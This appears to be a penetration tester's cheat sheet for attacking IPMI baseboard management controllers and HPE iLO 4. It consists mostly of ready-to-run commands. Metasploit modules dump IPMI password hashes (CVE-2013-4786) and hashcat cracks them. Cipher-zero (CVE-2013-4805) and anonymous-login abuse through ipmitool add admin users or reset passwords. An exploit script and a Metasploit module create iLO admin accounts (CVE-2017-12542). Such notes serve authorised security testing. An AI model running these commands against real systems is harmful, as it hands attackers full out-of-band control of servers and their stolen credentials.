IPMI
Intelligent Platform Management Interface

Discovery

msf > use auxiliary/scanner/ipmi/ipmi_version
msf > set RHOSTS file:ipmi.txt
msf > set THREADS 25
msf > run

Dump Hashes

CVE-2013-4786
Dump hashes:
msf > use auxiliary/scanner/ipmi/ipmi_dumphashes
msf > set OUTPUT_HASHCAT_FILE ipmi_hashes.txt
msf > set RHOSTS file:ipmi.txt
msf > set THREADS 25
msf > run
Recover plaintext passwords:
$ hashcat -m 7300 -O -a 0 -w 4 --session=ipmi -o ipmi.out ipmi.in seclists/Passwords/darkc0de.txt -r rules/d3ad0ne.rule --username

Cipher Zero

CVE-2013-4805
Discover with MSF:
msf > use auxiliary/scanner/ipmi/ipmi_cipher_zero
msf > set RHOSTS file:ipmi.txt
msf > set THREADS 25
msf > run
Guess existing admin username. If ADMIN username is correct, the list command will succeed (password doesn't matter):
$ sudo apt install ipmitool
$ ipmitool -I lanplus -C 0 -H 127.0.0.1 -U ADMIN -P DummyPassw0rd user list
Add new admin user (only existing admin username is needed):
$ ipmitool -I lanplus -C 0 -H 127.0.0.1 -U ADMIN -P DummyPassw0rd user set name <ID> snovvcrash
$ ipmitool -I lanplus -C 0 -H 127.0.0.1 -U ADMIN -P DummyPassw0rd user set password <ID> 'Passw0rd!'
$ ipmitool -I lanplus -C 0 -H 127.0.0.1 -U ADMIN -P DummyPassw0rd user priv <ID> 4
$ ipmitool -I lanplus -C 0 -H 127.0.0.1 -U ADMIN -P DummyPassw0rd user enable <ID>

Anonymous Authentication

Can be discovered with MSF ipmi_dumphashes but also with ipmitool:
$ ipmitool -I lanplus -H 127.0.0.1 -U '' -P '' user list
Change password of a named user account:
$ ipmitool -I lanplus -H 127.0.0.1 -U '' -P '' user set password <ID> 'Passw0rd!'

HPE iLO 4

Add Admin User

CVE-2017-12542
Exploit with Python:
$ ./44005.py -t -e -u snovvcrash -p 'Passw0rd!' 127.0.0.1
Exploit with MSF:
msf > use auxiliary/admin/hp/hp_ilo_create_admin_account
msf > set RHOSTS 10.10.13.37
msf > set USERNAME snovvcrash
msf > run